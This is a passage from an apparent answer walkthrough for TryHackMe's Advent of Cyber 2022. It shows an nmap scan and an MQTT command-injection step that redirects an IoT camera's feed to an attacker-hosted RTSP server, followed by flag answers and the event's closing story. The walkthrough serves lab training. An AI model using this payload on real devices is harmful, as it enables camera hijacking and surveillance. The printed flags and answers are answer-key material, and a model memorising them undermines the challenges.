SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1> SF:Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20cod SF:e:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsupport SF:ed\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p SF:>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20S SF:erver\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x2 SF:0\x20</body>\n</html>\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ans: 1883
I Highlighted the Line which Enumerates the device/init
If you cannot see the Enumeration. Perform the Given Command
nmap -sC -sV -p- <Target IP> -vv --min-rate 1500
Ans: y
Ans: 1.6.9
In case You Need mosquitto_sub, you can install it via the Command, But the Attack box has the Mosquitto clients installed
sudo apt install mosquitto-clients
2. Let’s Start the RTSP Server with the docker
sudo docker run --rm -it --network=host aler9/rtsp-simple-server
─$ sudo docker run --rm -it --network=host aler9/rtsp-simple-server
Unable to find image 'aler9/rtsp-simple-server:latest' locally
latest: Pulling from aler9/rtsp-simple-server
d7c47958dda1: Pull complete
Digest: sha256:44ce06f758a74f316ae4d912706c5212af2fb4765137e119ff689c5ec327dc94
Status: Downloaded newer image for aler9/rtsp-simple-server:latest
2022/12/22 06:06:45 INF rtsp-simple-server v0.21.0
2022/12/22 06:06:45 INF [RTSP] listener opened on :8554 (TCP), :8000 (UDP/RTP), :8001 (UDP/RTCP)
2022/12/22 06:06:45 INF [RTMP] listener opened on :1935
2022/12/22 06:06:45 INF [HLS] listener opened on :8888
2022/12/22 06:06:45 INF [WebRTC] listener opened on :8889
3. Now publish the Payload using the Following Command
mosquitto_pub -h <THM-Machine-IP> -t device/<Device-ID>/cmd -m """{"cmd":"10","url":"rtsp://<Your_Machine-IP>:8554/abcdefghijk"}"""
4. You can view what is being sent to the server by running VLC and opening the server path of the locally hosted RTSP server
vlc rtsp://127.0.0.1:8554/abcdefghijk
Ans: THM{UR_CAMERA_IS_MINE}
An attack vector is a tool, technique, or method used to attack a computer system or network. If we map the attack vectors to the physical world, attack vectors would be the weapons an adversary uses, like, swords, arrows, hammers, etc. A non-exhaustive list of examples of attack vectors in cybersecurity includes the following:
The attack surface is the surface area of the victim of an attack that can be impacted by an attack vector and cause damage. Taking forward our example of the physical world, the attack surface will include the unarmoured body of a soldier, which an attack of a sword, an arrow, or a hammer, etc., can damage. In cybersecurity, the attack surface will generally contain the following:
Ans: THM{4TT4CK SURF4C3 R3DUC3D}
THM{AoC2022!thank_you!}
Ah, what a month! As McSkidy watched Santa’s sleigh take off, loaded with gifts, she sighed with relief.
We did it!
Looking around the workshop, she could see Santa’s SOC Team working on their tasks.
Some were setting up additional defenses, some were implementing new security policies,
and some were trying out new skills (and hats!) too.
There are some things McSkidy can’t see, but would be vital for you to know.
The Bandit Yeti has left the area and returned to his lair, defeated for now.
If we could look inside his planning room, we’d see the beginnings
of a new scheme, but let’s not worry about that today!
As McSkidy returned to her office, she looked at her desk,
where just 24 days ago, an evil-looking card was placed.
Now that spot was occupied by a scroll with a massive security to-do list.
They all worked hard to clear as many items as possible, but many remain.
Security is never done!
However, with Santa in the air, she could cross out “Save Christmas” off the list. Success!
McSkidy and all the Elves from Santa’s Security Team thank you for your help this year.
They promised to call you if they get into trouble in 2023!
TryHackMe , tryhackme , THM , thm , Advent of Cyber 2022 , advent of cyber 2022 , advent of cyber 4 , advent of cyber 2022 all answers , Advent of Cyber 2022 All Answers , advent of cyber 2022 day 1 , advent of cyber 2022 day 1 , advent of cyber 2022 day 2, advent of cyber 2022 day 3, advent of cyber 2022 day 4 , advent of cyber 2022 day 5, advent of cyber 2022 day 6, advent of cyber 2022 day 7, advent of cyber 2022 day 8, advent of cyber 2022 day 9, advent of cyber 2022 day 10 , advent of cyber 2022 day 11 , advent of cyber 2022 day 12 , advent of cyber 2022 day 13, advent of cyber 2022 day 14 , advent of cyber 2022 day 15, advent of cyber 2022 day 16, advent of cyber 2022 day 17, advent of cyber 2022 day 18, advent of cyber 2022 day 19, advent of cyber 2022 day 20 , advent of cyber 2022 day 21 , advent of cyber 2022 day 22 , advent of cyber 2022 day 23 , advent of cyber 2022 day 24 , cyberw1ng , karthikeyan nagaraj , karthikeyannagaraj , karthikeyan , cyber w1ng , cyberwing